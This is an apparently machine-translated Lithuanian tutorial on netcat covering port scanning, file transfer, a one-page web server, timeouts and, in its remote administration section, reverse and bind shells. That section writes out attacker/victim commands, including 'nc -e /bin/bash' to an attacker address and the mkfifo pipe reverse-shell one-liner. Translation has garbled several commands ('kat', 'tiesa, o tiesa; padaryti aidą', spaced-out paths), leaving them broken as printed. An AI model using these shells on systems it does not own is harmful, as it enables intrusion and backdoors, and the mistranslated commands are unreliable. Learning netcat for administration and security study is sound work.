Trumpas „netcat-traditional“ ir „netcat-openbsd“ skirtumas
Netcat yra du panašūs paketai, turintys šiek tiek skirtumų.
netcat-tradicinis apima papildomą „-e“ parinktį, kurią galima naudoti įrišant programą (t.e bash) su netcat. Ši funkcija yra labai naudinga nuotolinio administravimo tikslais.
netcat-openbsd turite papildomą palaikymą „IPv6“ ir tarpiniams serveriams.
„Netcat“ diegimas
Nors „netcat“ yra iš anksto įdiegtas daugumoje „Linux“ paskirstymų, bet jei ne, jį galima lengvai įdiegti naudojant šias komandas.
Tradiciniam paketui,
[apsaugotas el. paštu]: ~ $ sudo apt-get install netcat-traditional„OpenBSD“ versijai,
[apsaugotas el. paštu]: ~ $ sudo apt-get install netcat-openbsd„Netcat for Windows“ galite atsisiųsti iš čia https: // sourceforge.net / projektai / nc110 / failai /.
Dabar mes išnagrinėsime keletą įdomių „netcat“ naudojimo atvejų
Uosto nuskaitymas naudojant „netcat“
Norėdami ieškoti atvirų prievadų, naudokite „-z“ parinktį. „Netcat“ bandys prisijungti prie kiekvieno uosto, nesiųsdamas duomenų ar labai ribotų duomenų UDP atveju. Įveskite šiuos duomenis
[apsaugotas el. pašto adresas]: ~ $ nc -z -v hackme.org 80... iškirpti ..
Hackme.org [217.78.1.155] 80 (http) atidarytas
Norėdami nuskaityti uostų diapazoną, įveskite
[el. pašto saugoma]: ~ $ nc -z -nv 192.168.100.72 20–80(Nežinoma) [192.168.100.72] 80 (http) atidarytas
(Nežinoma) [192.168.100.72] 22 (ssh) atidarytas
Failų perdavimas naudojant „netcat“
Kitas naudingas „netcat“ naudojimo atvejis yra failų perdavimas tarp nuotolinių kompiuterių. Tekstus ir dvejetainius failus galite siųsti iš vieno kompiuterio į kitą. Pabandysime išsiųsti failą „failas“.pdf “iš„ Linux “kompiuterio į„ Windows “kompiuterį [IP 192.168.100.72] pavyzdžiu naudojant „netcat“.
„Windows“ kompiuteryje (imtuve) įveskite šiuos duomenis
C: \ Vartotojai> nc -nvlp 1337> failas.pdfKlausau [0.0.0.0] (šeima 2, 1337 uostas)
„Linux“ kompiuteryje (siuntėjas) įveskite šiuos duomenis
[el. pašto saugoma]: ~ $ nc -nv 192.168.100.72 1337 < file.pdfPrisijungimas prie 192.168.100.72 1337 prievadas [tcp / *] pavyko!
Nuotolinis administravimas naudojant „netcat“
Vienas geriausių „netcat“ naudojimo atvejų yra nuotolinis administravimas, tai reiškia, kad naudodamiesi „netcat“ galite valdyti kito asmens kompiuterį. „Netcat-traditional“ yra „-e“ parinktis, kurią galima naudoti programai susieti (t.e cmd.exe sistemoje „Windows“ arba „bash“ sistemoje „Linux“) su prievadu, tai reiškia, kad „netcat“ veiks kaip komunikatorius tarp programos ir nuotolinio kompiuterio. „Netcat“ gaus komandas iš nuotolinio kompiuterio, vykdys vietinėje sistemoje ir išsiųs rezultatus atgal į nuotolinį kompiuterį. Ši funkcija yra plačiai naudojama kenkėjiškiems tikslams, norint išlaikyti kompiuterių ir serverių vidines duris. Ši funkcija pasiekiama tik tradiciniame „netcat“, tačiau tam tikru tikslu „netcat-openbsd“ taip pat gali būti naudojamas. Galite valdyti kitus asmeninius kompiuterius dviem būdais.
A Atvirkštinis apvalkalas užpuolikas klausosi uosto ir laukia, kol ryšys bus išsiųstas iš aukos mašinos. Jis naudojamas, kai aukos kompiuteris yra už NAT arba neturi viešojo IP.
Norėdami gauti atvirkštinį apvalkalą naudodami „netcat“, turite klausytis uosto naudodami „netcat“. Užpuoliko mašinoje įveskite šiuos duomenis,
[apsaugotas el. paštas]: ~ $ nc -nvlp 1337Klausau [0.0.0.0] (2 šeima, 1337 uostas)
Ant aukos mašinos (jei netcat-tradicinis yra įdiegta)
// pakeiskite „/ bin / bash“ į „cmd.exe “Windows atveju
[apsaugotas el. pašto adresas]: ~ $ nc -nv [IP_ADDR] 1337 -e / bin / bashDėl netcat-openbsd (kur parinktis „-e“ nepalaikoma)
[apsaugotas el. paštu]: ~ $ rm / tmp / f; mkfifo / tmp / f; kat/ tmp / f | / bin / sh -i 2> & 1 | nc [IP_ADDR] 1337> / tmp / f
Būdamas a Privalomas apvalkalas ryšį, užpuolikas susieja aukos mašinos prievadą ir prisijungia prie šio prievado naudodamas kliento lizdą. Jis naudojamas, kai užpuoliko mašina yra už NAT arba neturi viešo IP.
Ant aukos mašinos įveskite
[apsaugotas el. paštas]: ~ $ nc -nlvp 1337 -e / bin / bashklausau [bet kurio] 1337 m
Dabar, norėdami paleisti komandas aukos mašinoje, įveskite
[el. pašto saugoma]: ~ $ nc -nv 127.0.0.1 1337 mPrisijungimas prie 127.0.0.1 1337 prievadas [tcp / *] pavyko!
$ id
uid = 1000 (azad) gid = 1000 (azad) grupės = 1000 (azad), 4 (adm), 24 (cdrom), 27 (sudo),
30 (panardinti), 46 („plugdev“), 118 („lpadmin“), 129 („sambashare“)
Paprastas tinklo serveris, naudojantis „netcat“
Taip pat galite atlikti dar vieną paprastą gudrybę, kad „netcat“ būtų naudojamas kaip minimalus vieno puslapio interneto serveris. Šis žiniatinklio serveris būtų labai paprastas, be jokių specialių konfigūracijų, ir mes jį naudosime nusiųsdami savo HTML kodą į naršyklę.
[apsaugotas el. pašto adresas]: ~ $ tiesa, o tiesa; padaryti aidą -e "HTTP / 1.1 200 gerai \ n \ n $ (aidas "
Mano paprastas tinklo serveris, naudojantis „netcat“
")" | nc-nvlp 1337; padarytaKlausau [0.0.0.0] (šeima 2, 1337 uostas)
Dabar pabandykite gauti tinklalapį naudodamiesi garbanomis
[apsaugotas el. pašto adresas]: ~ $ curl http: // 127.0.0.1: 1337 /Mano paprastas tinklo serveris, naudojantis „netcat“
Nurodykite „netcat“ seanso skirtąjį laiką
Netcat sesijos skirtąjį laiką galite nurodyti naudodami parinktį „-w“. Pasibaigus nurodytam laikui, „Netcat“ automatiškai atjungs sesiją.
// -w [laikas sekundėmis][apsaugotas el. paštas]: ~ $ nc -w 40 -nvlp 1337
Klausau [0.0.0.0] (2 šeima, 1234 uostas)
Tęskite klausymą, net jei klientas uždaro ryšį
Įprastu režimu „netcat“ serveris išsijungia ir nustoja klausytis prievado, kai klientas nutraukia ryšį. Galite išlaikyti serverį naudodami parinktį „-k“
[apsaugotas el. paštas]: ~ $ nc -k -nlvp 1234Klausau [0.0.0.0] (2 šeima, 1234 uostas)
Išvada
„Netcat“ yra paprastas, bet efektyvus įrankis, kurį galima naudoti atliekant daugybę paprastų kasdienių užduočių. Jis iš anksto įdiegtas beveik visose UNIX sistemose, pvz., Operacinėse sistemose, ir gali būti naudojamas įvairioms užduotims atlikti, pvz., Ryšiui tarp dviejų kompiuterių, failų perdavimui ir daugeliui kitų.